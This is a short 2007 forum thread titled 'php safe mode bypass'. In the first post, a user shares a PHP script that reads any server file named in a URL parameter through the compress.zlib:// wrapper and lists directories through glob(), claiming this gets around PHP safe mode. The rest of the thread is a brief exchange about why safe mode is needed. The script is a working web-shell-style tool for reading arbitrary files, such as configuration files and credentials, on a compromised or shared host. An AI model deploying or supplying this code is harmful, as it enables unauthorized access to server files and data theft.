php safe mode bypass

taslayer · #1 (**permalink**) 08-20-07, 18:49

Code:

      <?
      
      function rsg_read()
	{	
	$test="";
	$temp=tempnam($test, "cx");
	$file=$_GET['file'];	
	$get=htmlspecialchars($file);
	echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
	if(copy("compress.zlib://".$file, $temp)){
	$fichier = fopen($temp, "r");
	$action = fread($fichier, filesize($temp));
	fclose($fichier);
	$source=htmlspecialchars($action);
	echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
	unlink($temp);
	} else {
	die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
	access.</CENTER></FONT>");
			}
	echo "</div>";
	}
	
	if(isset($_GET['file']))
{
rsg_read();
}
	
	?>
	
	<?
	
	function rsg_glob()
{
$chemin=$_GET['directory'];
$files = glob("$chemin*");
echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
foreach ($files as $filename) {
	echo "<pre>";
   echo "$filename\n";
   echo "</pre>";
}
}

if(isset($_GET['directory']))
{
rsg_glob();
}

?>

and that will get u around safe mode

zany · #2 (**permalink**) 08-22-07, 08:42

As I am new to php may I know why this safe mode is required.

taslayer · #3 (**permalink**) 08-22-07, 12:29

unless you want your box rooted through a remote file inclusion i would have it on ;)